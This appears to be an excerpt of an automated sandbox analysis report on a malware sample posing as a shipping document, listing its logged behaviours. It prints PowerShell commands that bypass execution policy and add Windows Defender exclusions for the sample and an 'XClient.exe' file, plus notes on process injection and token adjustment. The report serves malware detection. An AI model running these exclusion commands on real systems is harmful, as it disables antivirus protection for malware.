Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4521272765.0000000000CE7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlleer

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Memory written: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
